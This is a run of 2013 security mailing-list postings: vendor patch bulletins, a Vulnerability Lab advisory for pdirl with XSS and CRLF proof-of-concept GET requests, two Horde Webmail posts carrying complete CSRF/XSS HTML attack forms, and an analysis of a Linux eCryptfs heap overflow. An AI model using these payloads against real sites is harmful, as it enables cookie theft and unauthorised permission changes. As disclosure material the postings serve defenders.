pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities
Document Title:
===
pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1130
Release Date:
=
2013-11-01
Vulnerability Laboratory ID (VL-ID):
1130
Common Vulnerability Scoring System:
3.4
Product Service Introduction:
===
pdirl (PHPDirListing) is a tiny directory listing program. It is meant to be
better looking and more useful than the
directory listings produced by Apache. I didn`t want to reinvent the wheel so I
looked for an existing PHP script and
I ve found PHPDL by Greg Johnson, I added some features to it. (1.0.x is no
longer based on PHPDL.)
(Copy of the Vendor Homepage: http://pdirl.newroots.de/ )
Abstract Advisory Information:
==
An independent Vulnerability Laboratory Researcher discovered multiple web
vulnerabilities in the pdirl PHP Listing v1.0.4 web-application.
Vulnerability Disclosure Timeline:
==
2013-11-01:Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=
Published
Affected Product(s):
Greg Johnson
Product: pdirl PHP Listing - Web Application 1.0.4
Exploitation Technique:
===
Remote
Severity Level:
===
Medium
Technical Details Description:
Multiple client-side cross site scripting vulnerabilities are detected in the
official pdirl PHP Directory Listing web-application.
The vulnerability allows remote attackers to manipulate via GET method
web-application to browser requests (client-side).
The client-side cross site scripting web vulnerability is located in the
vulnerable index.php file and the id path value.
Remote attackers can manipulate the `index.php` file GET method request with
the vulnerable ./pdirl path value to compromise
client-side web application context.
Successful exploitation of the client-side cross site scripting web
vulnerability results in session hijacking, client-side
phishing, client-side unauthorized external redirects and client-side
manipulation of the contact formular module context.
Vulnerable Module(s):
[+] .pdirl
Vulnerable File(s):
[+] index.php
Vulnerable Path:
[+] ../icons/
[+] ../icons/default
[+] ../template/
[+] ../template/default
[+] ../.pdirl/templates
Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by
remote attackers without privileged web application user
account but with low user interaction. For demonstration or to reproduce ...
PoC: CS Cross Site Scripting
GET /[PATH]/?onmouseover='prompt(7331)'bad= HTTP/1.1
GET /[PATH]/.pdirl/?onmouseover='prompt(document.cookie)'bad= HTTP/1.1
GET /[PATH]/.pdirl/icons/?/title1ScRiPtprompt(document.cookie)/ScRiPt
HTTP/1.1
GET /[PATH]/.pdirl/icons/default/?onmouseover='prompt(document.cookie)'bad=
HTTP/1.1
GET /[PATH]/.pdirl/templates/?onmouseover='prompt(document.cookie)'bad=
HTTP/1.1
GET
/[PATH]/.pdirl/templates/default/?/title1ScRiPtprompt(document.cookie)/ScRiPt
HTTP/1.1
GET /[PATH]/index.php/%22onmouseover%3d'prompt(document.cookie)'bad%3d%22
HTTP/1.1
GET
/[PATH]/index.php?directory=.pdirl/templates/%22%20onmouseover%3dprompt(7331)%20bad%3d%22
HTTP/1.1
PoC: CRLF injection/HTTP Response Splitting
GET /[PATH]/index.php?directory=%0d%0a%20[CSRF:FORM:INJECT!]sortkey=name
PoC: Full Path Disclosure Links
GET
/[PATH]/index.php?directory='\'\);|]*{%0d%0a%00%bf%27'sortkey=namesortorder=SORT_DESC
HTTP/1.1
GET
/[PATH]/index.php?directory='\'\);|]*{%0d%0a%00%bf%27'gosearch=Search...
HTTP/1.1
GET /[PATH]/index.php?directory=./gosearch='\'\);|]*{%0d%0a%00%bf%27'
HTTP/1.1
GET /[PATH]/index.php?directory=./?directory=./search=..%c0%af HTTP/1.1
Security Risk:
==
1.1
The security risk of the client-side cross site scripting web vulnerabilities
are estimated as medium.
1.2
The security risk of the client-side cross site request forgery web
vulnerability is estimated as medium(-).
1.3
The security risk of the full path disclosure issue is estimated as low.
Credits Authors:
==
lincoln.dll (linc0ln@hotmail.com) [www.hackinq.pl]
Disclaimer Information:
=
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
[security bulletin] HPSBMU02931 rev.2 - HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03960916 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03960916 Version: 2 HPSBMU02931 rev.2 - HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-10-30 Last Updated: 2013-10-30 Potential Security Impact: Injection of arbitrary code, remote disclosure of privileged Information , improper Privilege management and cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Service Manager. The vulnerabilities could be exploited to allow injection of arbitrary code, remote disclosure of privileged Information , improper privilege management and cross site scripting (XSS). Note: this Service Manager update includes updated Apache Tomcat, OpenSSL, Oracle JRE that addresses security issues in those components References: CVE-2013-4830 (SSRT101316) CVE-2013-4831 CVE-2013-4832 CVE-2013-4833 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Service Manager v7.11, v9.32, v9.31, v9.30 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-4830(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-4831(AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2013-4832(AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2013-4833(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided patches to the below versions to resolve this issue. Download the updates for impacted versions from HP SSO Service Manager versions Patch URL AIX Server 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00446 HP Itanium Server 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00447 Linux Server 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00448 Solaris Server 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00449 Windows Server 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00450 Web Tier 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00451 Windows Client 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00452 KnowledgeManagement 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00454 Mobility 9.32.0005 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00455 Applications 9.32.0016 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00456 HP Service Manager v7.11 versions Patch URL AIX Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00482 HP Itanium Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00483 HP parisc Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00484 Linux x86 Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00485 Solaris Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00486 Windows Server 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00487 Web Tier 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00488 Windows Client 7.11.655 p21 http://support.openview.hp.com/selfsolve/document/LID/HPSM_00489 HISTORY Version:1 (rev.1) - 14 October 2013 Initial release Version:2 (rev.2) - 30 October 2013 added HP Service Manager v7.11 to impacted versions Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by
[SECURITY] [DSA 2790-1] nss security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2790-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso November 02, 2013 http://www.debian.org/security/faq - - Package: nss Vulnerability : uninitialized memory read Problem type : remote Debian-specific: no CVE ID : CVE-2013-1739 Debian Bug : 726473 A flaw was found in the way the Mozilla Network Security Service library (nss) read uninitialized data when there was a decryption failure. A remote attacker could use this flaw to cause a denial of service (application crash) for applications linked with the nss library. The oldstable distribution (squeeze) is not affected by this problem. For the stable distribution (wheezy), this problem has been fixed in version 2:3.14.4-1. The packages in the stable distribution were updated to the latest patch release 3.14.4 of the library to also include a regression bugfix for a flaw that affects the libpkix certificate verification cache. More information can be found via: https://developer.mozilla.org/en-US/docs/NSS/NSS_3.14.4_release_notes For the testing distribution (jessie), this problem has been fixed in version 2:3.15.2-1. For the unstable distribution (sid), this problem has been fixed in version 2:3.15.2-1. We recommend that you upgrade your nss packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJSdJSfAAoJEAVMuPMTQ89EolAQAKJMoAA1k5jKzEa6sXzt2nut Osw/Km/Jio6qBQdUMc40QeRWjy3dCNtufE6t+ffRH/NUg/ZREE+5YPbKYuZXqKVQ LJ+7CUlv8FClKafoW1UvHjPmj8lfTFjI1e31dh4KgOkqanZ2ufVwWETolvEoEkTs gySXv1z5e0/OgpSHx9pHmJbYmC+p4+fex/eK3OrCGynQNh1MAarcetiXVl4QnbFe uJ5YE4jdJGJ4p746b1zVKGKLNKtVW5cT6h4HMZ6EHLBbGAfi35i+Qa9ZdQMS1ncC 3xssfmmGVR+J8hzyMNx3USCHRe5CjqOIsR0oaEcmijO/m/7w+GSzk0jIYxI9PgyV RmRf+sLoSBSvlaFHTfaqOF/vPJXL1S7vPkMNWJ/pQQk8QueEsTdH+FzZh99aQ1eP IMHd2GYF3sgD8LjafxFBkXLVDTgfR3LilMOAZHGVM6+jFySeGiv80ywGnvlWuuV4 2fDNiOFClDeziECezCQSxsizC2TZ9jHyB7NcxxhYt40w5q66i8UhLBWXwKjXLRco FVvAHIs8RfSlHDvIag2+TttSuTuQ20zAS83lXMsA2UyP4PLGGpRg6mPcfs4TgGN3 69oq4YaySp6dxvu8WcxdMQWMKj4LamT+XUch6q44euNystg1MNILK7tgGeFti0Mk vSnOSXPCRrlLrCsHVR2/ =4pBK -END PGP SIGNATURE-
[slackware-security] mozilla-thunderbird (SSA:2013-307-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2013-307-01) New mozilla-thunderbird packages are available for Slackware 13.37, 14.0, and -current to fix security issues. Here are the details from the Slackware 14.0 ChangeLog: +--+ patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/known-vulnerabilities/thunderbirdESR.html (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.10esr-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.10esr-x86_64-1_slack14.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.0-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.0-x86_64-1.txz MD5 signatures: +-+ Slackware 13.37 package: 991bfbd613a42ac8088118f824d77f15 mozilla-thunderbird-17.0.10esr-i486-1_slack13.37.txz Slackware x86_64 13.37 package: ded7c8bfdb23fe335f5be18b76874420 mozilla-thunderbird-17.0.10esr-x86_64-1_slack13.37.txz Slackware 14.0 package: f2195286f809a1e0df44fb2a08c9c9ba mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 2e67fdb730d5c585d6489adb65aadc72 mozilla-thunderbird-17.0.10esr-x86_64-1_slack14.0.txz Slackware -current package: 5896f50d2a7b8e7b0cd98bbfafbe3884 xap/mozilla-thunderbird-24.1.0-i486-1.txz Slackware x86_64 -current package: 385e35f8a0ebfbdb0e89bd13e8f4b120 xap/mozilla-thunderbird-24.1.0-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg mozilla-thunderbird-17.0.10esr-i486-1_slack14.0.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlJ1+0UACgkQakRjwEAQIjP2WwCggYqxLGXyRYMS1qyba6gmW3Eh yhIAn0hMR3vQjTH2Y7aYoUr0Q+rBquN0 =spcq -END PGP SIGNATURE-
XSS and CSRF Horde Groupware Web mail Edition
# Exploit Title : XSS and CSRF Horde Groupware Web mail Edition Author:Marcela Benetrix Date: 10/28/13 version: 5.1.2 software link:http://www.horde.org/apps/webmail # GroupWare Web mail Edition Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project ## CSRF/XSS Location Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks. ## POC html body form action=http://www.victim.com/horde/turba/search.php; method=POST input type=hidden name=source value= / input type=hidden name=criteria value= / input type=hidden name=val value= / input type=hidden name=search value=Search / input type=hidden name=save#95;vbook value=on / input type=hidden name=vbook#95;name value=scriptalert(1)/script / input type=submit value=Submit request / /form /body /html ### CVE identifier CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack. ## Vendor Notification 10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803 11/04/2013: Disclosure
CSRF Horde Groupware Web mail Edition
# Exploit Title : CSRF Horde Groupware Web mail Edition Author:Marcela Benetrix Date: 10/28/13 version: 5.1.2 software link:http://www.horde.org/apps/webmail # GroupWare Web mail Edition Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project ## CSRF Location Change of permissions functionality was found to miss unique token in the form. ## PoC html body form action=www.victim.com/horde/services/shares/edit.php method=POST input type=hidden name=actionID value=editform / input type=hidden name=cid value=37 / input type=hidden name=app value=turba / input type=hidden name=owner#95;input value=kenedyK / input type=hidden name=u#95;names#91;#124;#124;new#95;input#93; value=AttackerUserName / input type=hidden name=u#95;read#91;#124;#124;new#95;input#93; value=on / input type=hidden name=u#95;edit#91;#124;#124;new#95;input#93; value=on / input type=hidden name=u#95;delete#91;#124;#124;new#95;input#93; value=on / input type=hidden name=g#95;names#91;#124;#124;new#93; value= / input type=hidden name=save#95;and#95;finish value=Save#32;and#32;Finish / input type=submit value=Submit request / /form /body /html Preconditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them, he can launch the attack. ### CVE identifier CVE-2013-6365. ## Vendor Notification 10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12804 11/04/2013: Disclosure
XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow Vulnerability
++
| XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow
Vulnerability |
++
Vulnerable versions:
- linux kernel 2.6.18
Testbed: linux kernel 2.6.18
Type: Local
Impact: kernel panic or potential local privelge escalation.
Vendor: http://www.kernel.org
Author: x90c geinblues *nospam* gmail dot com
Site: x90c.org
=
ABSTRACT:
=
The write_tag_3_packet() in Linux Kernel eCryptfs is vulnerable to heap buffer
overflow.
It lead to kernel panic and potentialy privilege escalation. The vulnerability
occured
with no checks to memory copy length variable in the vulnerable function.
=
DETAILS:
=
The ecryptfs_create() in ecryptfs/inode.c called when operation to create an
directory
in the ecryptfs file system. When after ecryptfs_create() called finally to
reach to
the vulnerable point of memcpy in the vulnerable function of write_tag_3_packet.
[write_tag_3_packet() in ecryptfs/keystore.c]:
..
} else /* no aes, no 0, 24 key size? */
auth_tok-session_key.encrypted_key_size = crypt_stat-key_size; /* (1) */
key_rec-enc_key_size = /* (2) */
auth_tok-session_key.encrypted_key_size;
/* vulnerable point (2, 3 arguments usercontrollable) */
memcpy(key_rec-enc_key, auth_tok-session_key.encrypted_key,
key_rec-enc_key_size);
..
If see The vulnerable point, key_rec-enc_key_size is usercontrolable variable.
(1) Store the crypt_stat-key_size to authtok-session_key.encrypted_key_size
and (2)
store the authtok-session_key.encrypted_key_size to key_rec-enc_key_size.
In other word, the crypt_stat-key_size to the key_rec-enc_key_size
usercontrollable
variable at the vulnerable point.
The Enter to the vulnerable point, no aes and 0, 24 key size.
If can control crypt_stat-key_size variable, lead to the heap buffer overflow.
First see the call path from ecryptfs_create() in ecryptfs/inode.c to
vulnerable point.
[call path to the vulnerable point]
ecryptfs/inode.c::ecryptfs_create()
+- ecryptfs/inode.c::ecryptfs_initialize_file()
| - ecryptfs/crypto.c::ecryptfs_new_file_context()
|
+- ecryptfs/inode.c::ecryptfs_write_metadata()
- ecryptfs/crypto.c::ecryptfs_write_headers_virt()
- ecryptfs/keystore.c::ecryptfs_generate_key_packet_set()
- ecryptfs/keystore.c::write_tag_3_packet() (vulnerable function)
- memcpy(key_rec-enc_key,/* vulnerable point */
auth_tok-session_key.encrypted_key,
key_rec-enc_key_size); // XXX usercontrolable
key_rec-enc_key_size!
The ecryptfs_initialize_file in ecryptfs/inode.c store the crypt_stat-key_size
by
the variable passed to kernel (mount options). In ecryptfs_new_file_context
store mount_crypt_stat-global_default_cipher_key_size to crypt_stat-key_size.
the global*key_size is the variable can control at the parse mount options.
[ecryptfs/crypto.c]:
int ecryptfs_new_file_context(struct dentry *ecryptfs_dentry)
{
..
crypt_stat-key_size =
mount_crypt_stat-global_default_cipher_key_size;
..
The mount_crypt_stat-global_default_cipher_key_size can be set by parse
option 'ecryptfs_opt_ecryptfs_key_bytes'. (usercontrollable variable)
[ecryptfs/main.c]:
static int ecryptfs_parse_options(struct super_block *sb, char *options)
{
..
case ecryptfs_opt_ecryptfs_key_bytes:
cipher_key_bytes_src = args[0].from;
cipher_key_bytes =
(int)simple_strtol(cipher_key_bytes_src,
cipher_key_bytes_src, 0);
mount_crypt_stat-global_default_cipher_key_size =
cipher_key_bytes;
ecryptfs_printk(KERN_DEBUG,
The mount_crypt_stat
global_default_cipher_key_size
set to: [%d]\n, mount_crypt_stat-
global_default_cipher_key_size);
cipher_key_bytes_set = 1;
break;
The memcpy copy size at vulnerable point can be set by usercontrolable variable
via the 'ecryptfs_opt_ecryptfs_key_bytes' mount option.
/* vulnerable point */
memcpy(key_rec-enc_key, auth_tok-session_key.encrypted_key,
key_rec-enc_key_size);
The second argument also can user controllable, in this advisory just commented
on it.
heap buffer overflow!
===
EXPLOIT CODES:
===
-
=
PATCH CODES:
=
-
===
VENDOR STATUS:
===
2013/11/04 - The vulnerability discovered.
2013/11/04 - Advisory released on full-disclosure, bugtraq, packetstorm,
exploit-db
DISCLAIMER:
The authors reserve the right not to be responsible for the topicality,
[SECURITY] [DSA 2791-1] tryton-client security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2791-1 secur...@debian.org http://www.debian.org/security/Florian Weimer November 04, 2013 http://www.debian.org/security/faq - - Package: tryton-client Vulnerability : missing input sanitization Problem type : remote Debian-specific: no Cedric Krier discovered that the Tryton client does not sanitize the file extension supplied by the server when processing reports. As a result, a malicious server could send a report with a crafted file extension that causes the client to write any local file to which the user running the client has write access. For the oldstable distribution (squeeze), this problem has been fixed in version 1.6.1-1+deb6u1. For the stable distribution (wheezy), this problem has been fixed in version 2.2.3-1+deb7u1. We recommend that you upgrade your tryton-client packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJSd0JkAAoJEL97/wQC1SS+yxIIAKhE710knodmQwpAoCSobSwp 3cK7RK7PIMkiyAfLnNi646cU0xXGWydgwydxvm1VyULBtsBbaOaEXzOu8j2eOYVR WQeUEy3kiDGE3J38QUzaf0MGejZI3jZQRERkYIxEOkEvsHZqZYLLe+BOvOt1Nz2T vMMRqCjcAN+k1eE271tL9omWZxpsVCFG0uIGwfTmpCgf7QGKqnlnuMfrpeDQ+7/3 8VOE6EOrIBbFdXeXxW/TKM94Z8HGGkpU+GUJ2FiMyF0q0e8e4n2JG0sldnIeM9RF cSrv5550JSSGgCLh3t3JtBTCsvQMGfnPKKdvx781vIz0inTgXy2SFAYaUukBPks= =ZvvC -END PGP SIGNATURE-
